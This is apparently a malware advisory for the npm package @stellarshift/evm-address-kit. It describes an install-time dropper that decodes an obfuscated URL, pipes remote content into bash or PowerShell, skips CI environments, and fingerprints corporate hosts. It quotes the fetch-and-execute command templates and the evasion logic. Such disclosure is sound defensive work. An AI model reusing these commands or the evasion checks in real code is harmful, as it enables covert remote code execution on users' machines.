MAL-2026-15823
Malicious code in @stellarshift/evm-address-kit (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f8ad9957f1e31e5afe261cb73c0c5b76ff23a86b23ebae0704e7e2934be79979) The package declares a `postinstall` script that invokes `syncRemoteManifest` in `lib/runtime/manifest-sync.js`. The destination URL is not present in cleartext: `lib/runtime/endpoint-registry.json` stores an integer array under an `ss-xor-v1` encoding with seed `evm-address-kit`, which `lib/runtime/config-resolver.js` decodes via `segments[i] ^ key.charCodeAt(i % key.length) ^ ((i * 7 + 13) & 0xff)` at runtime to reconstruct an `https://` URL. The dropper then executes `curl -fsSL '<url>' | bash` on Linux/macOS or `powershell... iex (iwr -UseBasicParsing -Uri $uri).Content` on Windows in a detached child process, piping opaque remote content directly into a shell/PowerShell interpreter. Execution is gated by `dev-profile.js`: it aborts when common CI environment variables are set (`CI`, `GITHUB_ACTIONS`, `GITLAB_CI`, `JENKINS_URL`, `BUILDKITE`, `CIRCLECI`, `TF_BUILD`, `CONTINUOUS_INTEGRATION`) and, on darwin/win32, requires both a Lark/Feishu install (`/Applications/Lark.app`, `/Applications/Feishu.app`) and a FortiClient install (`Fortinet\FortiClient`) to be present. The stated purpose of the package is EVM address checksumming, which does not justify runtime URL obfuscation, remote shell execution at install time, or corporate-workstation fingerprinting. The combination — install-time execution, obfuscated destination, CI evasion, and specific-vendor host fingerprinting — is a targeted install-time remote code execution dropper aimed at managed corporate endpoints running Lark/Feishu with FortiClient VPN.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for @stellarshift/evm-address-kit (npm). Pin to a known-safe version or switch to an alternative.